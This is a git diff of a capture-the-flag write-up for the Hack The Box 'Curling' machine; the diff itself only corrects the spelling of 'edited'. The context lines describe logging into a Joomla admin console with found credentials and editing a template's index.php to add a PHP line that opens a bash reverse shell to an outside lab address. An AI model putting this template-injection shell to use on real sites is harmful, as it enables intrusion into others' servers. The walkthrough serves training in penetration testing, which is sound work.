--- a/_posts/2018-12-22-Curling.md
+++ b/_posts/2018-12-22-Curling.md
@@ -111,7 +111,7 @@ As the `/administrator` directory sounds lucrative, the directory was visited wh
 
 ![joomla_login.png](/assets/images/htb/curling/joomla_login.png)
 
-Using the same credentials as before (`floris / Curling2018!`), the Joomla! administrator console can be accessed. From this console, there are a lot of possibilities. For example, users can be editted, templates can be modified, and extensions can be installed.
+Using the same credentials as before (`floris / Curling2018!`), the Joomla! administrator console can be accessed. From this console, there are a lot of possibilities. For example, users can be edited, templates can be modified, and extensions can be installed.
 
 ![joomla_tour.gif](/assets/images/htb/curling/joomla_tour.gif)
 
@@ -119,13 +119,13 @@ From the sidebar under the "Configuration" header is the option to edit template
 
 ![protostar_default.png](/assets/images/htb/curling/protostar_default.png)protostar_default.png
 
-Clicking on the "Protostar" link under the "Template" column shown in the image above directs to a page that allows for the files included in the template to be editted. Also, this page shows that the templates include PHP files. 
+Clicking on the "Protostar" link under the "Template" column shown in the image above directs to a page that allows for the files included in the template to be edited. Also, this page shows that the templates include PHP files. 
 
 Checking out the `index.php` file confirms that this file builds the home page present at `http://10.10.10.150`, as the last three lines of contain the same reference to `secret.txt` as found in the HTML source code previously.
 
 ![edit_index1.png](/assets/images/htb/curling/edit_index1.png)
 
-The `index.php` file was next editted to include the code shown below:
+The `index.php` file was next edited to include the code shown below:
 
 ```
 echo exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'");
